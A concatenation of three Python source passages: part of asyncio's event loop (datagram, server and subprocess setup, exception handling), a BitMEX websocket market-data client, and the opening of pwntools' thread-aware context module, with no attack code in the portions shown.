for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
assert isinstance(addr, tuple) and len(addr) == 2, (
'2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
(remote_addr and addr_pair[1] is None))]
if not addr_pairs_info:
raise ValueError('can not get address information')
exceptions = []
# bpo-37228
if reuse_address is not _unset:
if reuse_address:
raise ValueError("Passing `reuse_address=True` is no "
"longer supported, as the usage of "
"SO_REUSEPORT in UDP poses a significant "
"security concern.")
else:
warnings.warn("The *reuse_address* parameter has been "
"deprecated as of 3.5.10 and is scheduled "
"for removal in 3.11.", DeprecationWarning,
stacklevel=2)
for ((family, proto),
(local_address, remote_address)) in addr_pairs_info:
sock = None
r_addr = None
try:
sock = socket.socket(
family=family, type=socket.SOCK_DGRAM, proto=proto)
if reuse_port:
_set_reuseport(sock)
if allow_broadcast:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setblocking(False)
if local_addr:
sock.bind(local_address)
if remote_addr:
if not allow_broadcast:
await self.sock_connect(sock, remote_address)
r_addr = remote_address
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
raise exceptions[0]
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_datagram_transport(
sock, protocol, r_addr, waiter)
if self._debug:
if local_addr:
logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
"created: (%r, %r)",
local_addr, remote_addr, transport, protocol)
else:
logger.debug("Datagram endpoint remote_addr=%r created: "
"(%r, %r)",
remote_addr, transport, protocol)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
async def create_server(
self, protocol_factory, host=None, port=None,
*,
family=socket.AF_UNSPEC,
flags=socket.AI_PASSIVE,
sock=None,
backlog=100,
ssl=None,
reuse_address=None,
reuse_port=None,
ssl_handshake_timeout=None,
start_serving=True):
"""Create a TCP server.
The host parameter can be a string, in that case the TCP server is
bound to host and port.
The host parameter can also be a sequence of strings and in that case
the TCP server is bound to all hosts of the sequence. If a host
appears multiple times (possibly indirectly e.g. when hostnames
resolve to the same IP address), the server is only bound once to that
host.
Return a Server object which can be used to stop the service.
This method is a coroutine.
"""
if isinstance(ssl, bool):
raise TypeError('ssl argument must be an SSLContext or None')
if ssl_handshake_timeout is not None and ssl is None:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
if reuse_address is None:
reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
sockets = []
if host == '':
hosts = [None]
elif (isinstance(host, str) or
not isinstance(host, collections.abc.Iterable)):
hosts = [host]
else:
hosts = host
fs = [self._create_server_getaddrinfo(host, port, family=family,
flags=flags)
for host in hosts]
infos = await tasks.gather(*fs, loop=self)
infos = set(itertools.chain.from_iterable(infos))
completed = False
try:
for res in infos:
af, socktype, proto, canonname, sa = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error:
# Assume it's a bad family/type/protocol combination.
if self._debug:
logger.warning('create_server() failed to create '
'socket.socket(%r, %r, %r)',
af, socktype, proto, exc_info=True)
continue
sockets.append(sock)
if reuse_address:
sock.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
if reuse_port:
_set_reuseport(sock)
# Disable IPv4/IPv6 dual stack support (enabled by
# default on Linux) which makes a single socket
# listen on both address families.
if (_HAS_IPv6 and
af == socket.AF_INET6 and
hasattr(socket, 'IPPROTO_IPV6')):
sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_V6ONLY,
True)
try:
sock.bind(sa)
except OSError as err:
raise OSError(err.errno, 'error while attempting '
'to bind on address %r: %s'
% (sa, err.strerror.lower())) from None
completed = True
finally:
if not completed:
for sock in sockets:
sock.close()
else:
if sock is None:
raise ValueError('Neither host/port nor sock were specified')
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
sockets = [sock]
for sock in sockets:
sock.setblocking(False)
server = Server(self, sockets, protocol_factory,
ssl, backlog, ssl_handshake_timeout)
if start_serving:
server._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self)
if self._debug:
logger.info("%r is serving", server)
return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
"""Handle an accepted connection.
This is used by servers that accept connections outside of
asyncio but that use asyncio to handle connections.
This method is a coroutine. When completed, the coroutine
returns a (transport, protocol) pair.
"""
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
def default_exception_handler(self, context):
"""Default exception handler.
This is called when an exception occurs and no exception
handler is set, and can be called by a custom exception
handler that wants to defer to the default behavior.
This default handler logs the error message and other
context-dependent information. In debug mode, a truncated
stack trace is also appended showing where the given object
(e.g. a handle or future or task) was created, if any.
The context parameter has the same meaning as in
`call_exception_handler()`.
"""
message = context.get('message')
if not message:
message = 'Unhandled exception in event loop'
exception = context.get('exception')
if exception is not None:
exc_info = (type(exception), exception, exception.__traceback__)
else:
exc_info = False
if ('source_traceback' not in context and
self._current_handle is not None and
self._current_handle._source_traceback):
context['handle_traceback'] = \
self._current_handle._source_traceback
log_lines = [message]
for key in sorted(context):
if key in {'message', 'exception'}:
continue
value = context[key]
if key == 'source_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Object created at (most recent call last):\n'
value += tb.rstrip()
elif key == 'handle_traceback':
tb = ''.join(traceback.format_list(value))
value = 'Handle created at (most recent call last):\n'
value += tb.rstrip()
else:
value = repr(value)
log_lines.append(f'{key}: {value}')
logger.error('\n'.join(log_lines), exc_info=exc_info)
def call_exception_handler(self, context):
"""Call the current event loop's exception handler.
The context argument is a dict containing the following keys:
- 'message': Error message;
- 'exception' (optional): Exception object;
- 'future' (optional): Future instance;
- 'task' (optional): Task instance;
- 'handle' (optional): Handle instance;
- 'protocol' (optional): Protocol instance;
- 'transport' (optional): Transport instance;
- 'socket' (optional): Socket instance;
- 'asyncgen' (optional): Asynchronous generator that caused
the exception.
New keys maybe introduced in the future.
Note: do not overload this method in an event loop subclass.
For custom exception handling, use the
`set_exception_handler()` method.
"""
if self._exception_handler is None:
try:
self.default_exception_handler(context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Second protection layer for unexpected errors
# in the default implementation, as well as for subclassed
# event loops with overloaded "default_exception_handler".
logger.error('Exception in default exception handler',
exc_info=True)
else:
try:
self._exception_handler(self, context)
except (SystemExit, KeyboardInterrupt):
raise
except BaseException as exc:
# Exception in the user set custom exception handler.
try:
# Let's try default handler.
self.default_exception_handler({
'message': 'Unhandled error in exception handler',
'exception': exc,
'context': context,
})
except (SystemExit, KeyboardInterrupt):
raise
except BaseException:
# Guard 'default_exception_handler' in case it is
# overloaded.
logger.error('Exception in default exception handler '
'while handling an unexpected error '
'in custom exception handler',
exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
"""Run one full iteration of the event loop.
This calls all currently ready callbacks, polls for I/O,
schedules the resulting callbacks, and finally schedules
'call_later' callbacks.
"""
sched_count = len(self._scheduled)
if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
self._timer_cancelled_count / sched_count >
_MIN_CANCELLED_TIMER_HANDLES_FRACTION):
# Remove delayed calls that were cancelled if their number
# is too high
new_scheduled = []
for handle in self._scheduled:
if handle._cancelled:
handle._scheduled = False
else:
new_scheduled.append(handle)
heapq.heapify(new_scheduled)
self._scheduled = new_scheduled
self._timer_cancelled_count = 0
else:
# Remove delayed calls that were cancelled from head of queue.
while self._scheduled and self._scheduled[0]._cancelled:
self._timer_cancelled_count -= 1
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
timeout = None
if self._ready or self._stopping:
timeout = 0
elif self._scheduled:
# Compute the desired timeout.
when = self._scheduled[0]._when
timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
event_list = self._selector.select(timeout)
self._process_events(event_list)
# Handle 'later' callbacks that are ready.
end_time = self.time() + self._clock_resolution
while self._scheduled:
handle = self._scheduled[0]
if handle._when >= end_time:
break
handle = heapq.heappop(self._scheduled)
handle._scheduled = False
self._ready.append(handle)
# This is the only place where callbacks are actually *called*.
# All other places just add them to ready.
# Note: We run all currently scheduled callbacks, but not any
# callbacks scheduled by callbacks run this time around --
# they will be run the next time (after another I/O poll).
# Use an idiom that is thread-safe without using locks.
ntodo = len(self._ready)
for i in range(ntodo):
handle = self._ready.popleft()
if handle._cancelled:
continue
if self._debug:
try:
self._current_handle = handle
t0 = self.time()
handle._run()
dt = self.time() - t0
if dt >= self.slow_callback_duration:
logger.warning('Executing %s took %.3f seconds',
_format_handle(handle), dt)
finally:
self._current_handle = None
else:
handle._run()
handle = None # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
|
ws_thread.py
|
import sys
import websocket
import threading
import traceback
import ssl
from time import sleep
import json
import decimal
import logging
from market_maker.settings import settings
from market_maker.auth.APIKeyAuth import generate_expires, generate_signature
from market_maker.utils.log import setup_custom_logger
from market_maker.utils.math import toNearest
from future.utils import iteritems
from future.standard_library import hooks
with hooks(): # Python 2/3 compat
from urllib.parse import urlparse, urlunparse
# Connects to BitMEX websocket for streaming realtime data.
# The Marketmaker still interacts with this as if it were a REST Endpoint, but now it can get
# much more realtime data without heavily polling the API.
#
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
class BitMEXWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
def __del__(self):
self.exit()
def connect(self, endpoint="", symbol="XBTN15", shouldAuth=True):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting WebSocket.")
self.symbol = symbol
self.shouldAuth = shouldAuth
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
subscriptions = [sub + ':' + symbol for sub in ["quote", "trade"]]
subscriptions += ["instrument"] # We want all of them
if self.shouldAuth:
subscriptions += [sub + ':' + symbol for sub in ["order", "execution"]]
subscriptions += ["margin", "position"]
# Get WS URL and connect.
urlParts = list(urlparse(endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe=" + ",".join(subscriptions)
wsURL = urlunparse(urlParts)
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)
self.logger.info('Connected to WS. Waiting for data images, this may take a moment...')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
if self.shouldAuth:
self.__wait_for_account()
self.logger.info('Got all market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
instruments = self.data['instrument']
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
bid = instrument['bidPrice'] or instrument['lastPrice']
ask = instrument['askPrice'] or instrument['lastPrice']
ticker = {
"last": instrument['lastPrice'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
def position(self, symbol):
positions = self.data['position']
pos = [p for p in positions if p['symbol'] == symbol]
if len(pos) == 0:
# No position found; stub it
return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
return pos[0]
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs))
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'trade', 'quote'} <= set(self.data):
sleep(0.1)
def __send_command(self, command, args):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args or []}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > BitMEXWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(BitMEXWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error(traceback.format_exc())
def __on_open(self):
self.logger.debug("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
ws = BitMEXWebsocket()
ws.logger = logger
ws.connect("https://testnet.bitmex.com/api/v1")
while(ws.ws.sock.connected):
sleep(1)
|
__init__.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Implements context management so that nested/scoped contexts and threaded
contexts work properly and as expected.
"""
import collections
import functools
import logging
import os
import platform
import socket
import string
import subprocess
import sys
import threading
import time
import socks
from ..device import Device
from ..timeout import Timeout
_original_socket = socket.socket
class _devnull(object):
name = None
def write(self, *a, **kw): pass
def read(self, *a, **kw): return ''
def flush(self, *a, **kw): pass
def close(self, *a, **kw): pass
class _defaultdict(dict):
"""
Dictionary which loads missing keys from another dictionary.
This is neccesary because the ``default_factory`` method of
:class:`collections.defaultdict` does not provide the key.
Examples:
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['foo']
'bar'
>>> 'foo' in b
False
>>> b['foo'] = 'baz'
>>> b['foo']
'baz'
>>> del b['foo']
>>> b['foo']
'bar'
>>> a = {'foo': 'bar'}
>>> b = pwnlib.context._defaultdict(a)
>>> b['baz'] #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: 'baz'
"""
def __init__(self, default=None):
super(_defaultdict, self).__init__()
if default is None:
default = {}
self.default = default
def __missing__(self, key):
return self.default[key]
class _DictStack(object):
"""
Manages a dictionary-like object, permitting saving and restoring from
a stack of states via :func:`push` and :func:`pop`.
The underlying object used as ``default`` must implement ``copy``, ``clear``,
and ``update``.
Examples:
>>> t = pwnlib.context._DictStack(default={})
>>> t['key'] = 'value'
>>> t
{'key': 'value'}
>>> t.push()
>>> t
{'key': 'value'}
>>> t['key'] = 'value2'
>>> t
{'key': 'value2'}
>>> t.pop()
>>> t
{'key': 'value'}
"""
def __init__(self, default):
self._current = _defaultdict(default)
self.__stack = []
def push(self):
self.__stack.append(self._current.copy())
def pop(self):
self._current.clear()
self._current.update(self.__stack.pop())
def copy(self):
return self._current.copy()
# Pass-through container emulation routines
def __len__(self): return self._current.__len__()
def __delitem__(self, k): return self._current.__delitem__(k)
def __getitem__(self, k): return self._current.__getitem__(k)
def __setitem__(self, k, v): return self._current.__setitem__(k, v)
def __contains__(self, k): return self._current.__contains__(k)
def __iter__(self): return self._current.__iter__()
def __repr__(self): return self._current.__repr__()
def __eq__(self, other): return self._current.__eq__(other)
# Required for keyword expansion operator ** to work
def keys(self): return self._current.keys()
def values(self): return self._current.values()
def items(self): return self._current.items()
class _Tls_DictStack(threading.local, _DictStack):
"""
Per-thread implementation of :class:`_DictStack`.
Examples:
>>> t = pwnlib.context._Tls_DictStack({})
>>> t['key'] = 'value'
>>> print t
{'key': 'value'}
>>> def p(): print t
>>> thread = threading.Thread(target=p)
>>> _ = (thread.start(), thread.join())
{}
"""
pass
def _validator(validator):
"""
Validator that tis tightly coupled to the implementation
of the classes here.
This expects that the object has a ._tls property which
is of type _DictStack.
"""
name = validator.__name__
doc = validator.__doc__
def fget(self):
return self._tls[name]
def fset(self, val):
self._tls[name] = validator(self, val)
def fdel(self):
self._tls._current.pop(name,None)
return property(fget, fset, fdel, doc)
class Thread(threading.Thread):
"""
Instantiates a context-aware thread, which inherit its context when it is
instantiated. The class can be accessed both on the context module as
`pwnlib.context.Thread` and on the context singleton object inside the
context module as `pwnlib.context.context.Thread`.
Threads created by using the native :class`threading`.Thread` will have a
clean (default) context.
Regardless of the mechanism used to create any thread, the context
is de-coupled from the parent thread, so changes do not cascade
to child or parent.
Saves a copy of the context when instantiated (at ``__init__``)
and updates the new thread's context before passing control
to the user code via ``run`` or ``target=``.
Examples:
>>> context.clear()
>>> context.update(arch='arm')
>>> def p():
... print context.arch
... context.arch = 'mips'
... print context.arch
>>> # Note that a normal Thread starts with a clean context
>>> # (i386 is the default architecture)
>>> t = threading.Thread(target=p)
>>> _=(t.start(), t.join())
i386
mips
>>> # Note that the main Thread's context is unchanged
>>> print context.arch
arm
>>> # Note that a context-aware Thread receives a copy of the context
>>> t = pwnlib.context.Thread(target=p)
>>> _=(t.start(), t.join())
arm
mips
>>> # Again, the main thread is unchanged
>>> print context.arch
arm
Implementation Details:
This class implemented by hooking the private function
:func:`threading.Thread._Thread_bootstrap`, which is called before
passing control to :func:`threading.Thread.run`.
This could be done by overriding ``run`` itself, but we would have to
ensure that all uses of the class would only ever use the keyword
``target=`` for ``__init__``, or that all subclasses invoke
``super(Subclass.self).set_up_context()`` or similar.
"""
def __init__(self, *args, **kwargs):
super(Thread, self).__init__(*args, **kwargs)
self.old = context.copy()
def __bootstrap(self):
"""
Implementation Details:
This only works because the class is named ``Thread``.
If its name is changed, we have to implement this hook
differently.
"""
context.update(**self.old)
super(Thread, self).__bootstrap()
def _longest(d):
"""
Returns an OrderedDict with the contents of the input dictionary ``d``
sorted by the length of the keys, in descending order.
This is useful for performing substring matching via ``str.startswith``,
as it ensures the most complete match will be found.
>>> data = {'a': 1, 'bb': 2, 'ccc': 3}
>>> _longest(data) == data
True
>>> for i in _longest(data): print i
ccc
bb
a
"""
return collections.OrderedDict((k,d[k]) for k in sorted(d, key=len, reverse=True))
def TlsProperty(object):
def __get__(self, obj, objtype=None):
return obj._tls
class ContextType(object):
r"""
Class for specifying information about the target machine.
Intended for use as a pseudo-singleton through the global
variable ``pwnlib.context.context``, available via
``from pwn import *`` as ``context``.
The context is usually specified at the top of the Python file for clarity. ::
#!/usr/bin/env python
context.update(arch='i386', os='linux')
Currently supported properties and their defaults are listed below.
The defaults are inherited from :data:`pwnlib.context.ContextType.defaults`.
Additionally, the context is thread-aware when using
:class:`pwnlib.context.Thread` instead of :class:`threading.Thread`
(all internal ``pwntools`` threads use the former).
The context is also scope-aware by using the ``with`` keyword.
Examples:
>>> context.clear()
>>> context.update(os='linux') # doctest: +ELLIPSIS
>>> context.os == 'linux'
True
>>> context.arch = 'arm'
>>> vars(context) == {'arch': 'arm', 'bits': 32, 'endian': 'little', 'os': 'linux'}
True
>>> context.endian
'little'
>>> context.bits
32
>>> def nop():
... print pwnlib.asm.asm('nop').encode('hex')
>>> nop()
00f020e3
>>> with context.local(arch = 'i386'):
... nop()
90
>>> from pwnlib.context import Thread as PwnThread
>>> from threading import Thread as NormalThread
>>> with context.local(arch = 'mips'):
... pwnthread = PwnThread(target=nop)
... thread = NormalThread(target=nop)
>>> # Normal thread uses the default value for arch, 'i386'
>>> _=(thread.start(), thread.join())
90
>>> # Pwnthread uses the correct context from creation-time
>>> _=(pwnthread.start(), pwnthread.join())
00000000
>>> nop()
00f020e3
"""
#
# Use of 'slots' is a heavy-handed way to prevent accidents
# like 'context.architecture=' instead of 'context.arch='.
#
# Setting any properties on a ContextType object will throw an
# exception.
#
__slots__ = '_tls',
#: Default values for :class:`pwnlib.context.ContextType`
defaults = {
'adb_host': 'localhost',
'adb_port': 5037,
